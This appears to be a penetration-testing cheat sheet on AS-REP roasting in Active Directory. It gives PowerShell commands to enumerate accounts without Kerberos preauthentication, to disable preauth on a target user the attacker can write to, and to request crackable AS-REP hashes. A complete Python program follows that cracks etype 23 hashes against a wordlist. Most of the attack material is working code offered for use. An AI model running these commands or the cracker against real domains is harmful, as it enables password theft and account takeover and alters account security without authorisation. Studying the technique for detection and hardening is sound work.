AS-REP Roast: PowerShell


If a user account's UserAccountControl has the "Do not require Kerberos preauthentication" flag (DONT_REQ_PREAUTH) set, anyone who can reach the KDC can send an AS-REQ for that account without proving knowledge of its password and gets back an AS-REP whose enc-part is encrypted with a key derived from the user's password. That encrypted blob can be taken offline and brute-forced against a wordlist; no lockouts, no traffic to the target beyond a single request.

With sufficient rights over a target user object (GenericWrite or GenericAll on it), the flag can also be set on that account, turning an otherwise safe user into a roastable one.

Enumeration

# Using PowerView (dev branch): list users with the DONT_REQ_PREAUTH flag set
Get-DomainUser -PreauthNotRequired -Verbose
# Using the ActiveDirectory module:
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth
# Using PowerView (dev): find ACEs held by the RDPUsers group, looking for GenericWrite/GenericAll on user objects
Invoke-ACLScanner -ResolveGUIDs |
?{$_.IdentityReferenceName -match "RDPUsers"}

Disabling Kerberos pre-auth on a target (needs GenericWrite/GenericAll)

# 4194304 = 0x400000 = DONT_REQ_PREAUTH. -XOR toggles the bit, so run it once and confirm the flag was not already set
Set-DomainObject -Identity TargetUser5 -XOR @{useraccountcontrol=4194304} -Verbose

Request encrypted AS-REP for offline brute-force

https://github.com/HarmJ0y/ASREPRoast

# Using ASREPRoast: request the AS-REP and output its crackable hash for one user
Get-ASREPHash -UserName VPN1user -Verbose
# Enumerate every user with Kerberos preauth disabled and request a hash for each
Invoke-ASREPRoast -Verbose
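The offline half of the attack, shown as an added example that is not part of the original page or of ASREPRoast: a small Python cracker for etype 23 (RC4-HMAC) AS-REP hashes in hashcat's mode 18200 format, `$krb5asrep$23$user@REALM:checksum$ciphertext` (the `$23$` is also accepted when absent). It implements RFC 4757 directly: the long-term key is MD4(UTF-16LE(password)), i.e. the NT hash, K1 = HMAC-MD5(key, key usage), K3 = HMAC-MD5(K1, checksum), plaintext = RC4(K3, ciphertext), and a candidate password is correct when HMAC-MD5(K1, plaintext) matches the checksum. The key usage is 8, the value Windows KDCs use for the AS-REP enc-part (RFC 4120 assigns 3; both are selectable). MD4 is implemented inline because OpenSSL 3 builds of `hashlib` often drop it. The principal `vpn1user@CORP.LOCAL`, the password, the wordlist and the sample hash are all constructed here for illustration, not captured from a real domain.

```python
import hmac
import hashlib
import struct

# Key usage number for the AS-REP enc-part. RFC 4120 assigns 3, but Windows KDCs
# use 8, so that is what AS-REP roast hashes need; parameterised so both can be tried.
AS_REP_KEY_USAGE = 8


def md4(data: bytes) -> bytes:
    """MD4 per RFC 1320 (needed for NT hashes; often missing from hashlib on OpenSSL 3)."""
    mask = 0xFFFFFFFF
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & mask

    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg)) % 64)
    msg += struct.pack("<Q", len(data) * 8)

    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    rounds = (
        (F, 0x00000000, [3, 7, 11, 19], list(range(16))),
        (G, 0x5A827999, [3, 5, 9, 13], [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]),
        (H, 0x6ED9EBA1, [3, 9, 11, 15], [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        v = [a, b, c, d]
        for fn, const, shifts, order in rounds:
            for i in range(16):
                t = (-i) % 4  # register being updated cycles a, d, c, b, a, ...
                v[t] = rotl((v[t] + fn(v[(t + 1) % 4], v[(t + 2) % 4], v[(t + 3) % 4])
                             + X[order[i]] + const) & mask, shifts[i % 4])
        a, b, c, d = ((x + y) & mask for x, y in zip((a, b, c, d), v))
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """RC4-HMAC (etype 23) long-term key: MD4 over the UTF-16LE password, i.e. the NT hash."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 keystream XOR (KSA + PRGA)."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def _hmac_md5(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, hashlib.md5).digest()


def rc4_hmac_encrypt(key, plaintext, confounder, usage=AS_REP_KEY_USAGE):
    """RFC 4757 section 6 encryption; returns (checksum, edata) as carried in the AS-REP."""
    assert len(confounder) == 8
    k1 = _hmac_md5(key, struct.pack("<I", usage))   # T = key usage as 32-bit little-endian
    data = confounder + plaintext
    checksum = _hmac_md5(k1, data)                    # K2 == K1 for non-export RC4-HMAC
    k3 = _hmac_md5(k1, checksum)
    return checksum, rc4(k3, data)


def rc4_hmac_decrypt(key, checksum, edata, usage=AS_REP_KEY_USAGE):
    """Returns the plaintext with the 8-byte confounder stripped, or None if the key is wrong."""
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    k3 = _hmac_md5(k1, checksum)
    data = rc4(k3, edata)
    if not hmac.compare_digest(_hmac_md5(k1, data), checksum):
        return None
    return data[8:]


def parse_asrep_hash(line: str):
    """Parse '$krb5asrep$23$user@REALM:<checksum hex>$<edata hex>'; the '$23$' may be absent."""
    for prefix in ("$krb5asrep$23$", "$krb5asrep$"):
        if line.startswith(prefix):
            break
    else:
        raise ValueError("not an etype-23 AS-REP hash line")
    principal, sep, blob = line[len(prefix):].partition(":")
    checksum_hex, sep2, edata_hex = blob.partition("$")
    if not (sep and sep2) or len(checksum_hex) != 32:
        raise ValueError("malformed AS-REP hash line")
    return principal, bytes.fromhex(checksum_hex), bytes.fromhex(edata_hex)


def crack(line: str, candidates):
    """Try each candidate password; return the first one whose key verifies the checksum."""
    principal, checksum, edata = parse_asrep_hash(line)
    for pw in candidates:
        if rc4_hmac_decrypt(nt_hash(pw), checksum, edata) is not None:
            return pw
    return None


def make_sample_hash(principal, password, plaintext, confounder):
    """Constructed test input: build a hash line the way a KDC's AS-REP would yield it."""
    checksum, edata = rc4_hmac_encrypt(nt_hash(password), plaintext, confounder)
    return f"$krb5asrep$23${principal}:{checksum.hex()}${edata.hex()}"


# Constructed sample, not a real capture. A real enc-part is a DER EncASRepPart whose
# first byte is the APPLICATION 25 tag 0x79, so the placeholder keeps that byte.
SAMPLE_HASH = make_sample_hash("vpn1user@CORP.LOCAL", "Summer2019!",
                               b"\x79" + b"constructed EncASRepPart placeholder", b"\x11" * 8)

if __name__ == "__main__":
    wordlist = ["Password1", "Welcome1", "Summer2019!", "Autumn2019!"]
    print(crack(SAMPLE_HASH, wordlist))
```

Two things the code makes concrete that the one-liners above hide: the only secret in the whole exchange is the NT hash, so a roastable account with a password in any common wordlist falls in seconds; and every candidate costs one MD4 plus three HMAC-MD5s and an RC4 pass, which is why production crackers such as hashcat run this on GPUs rather than in Python.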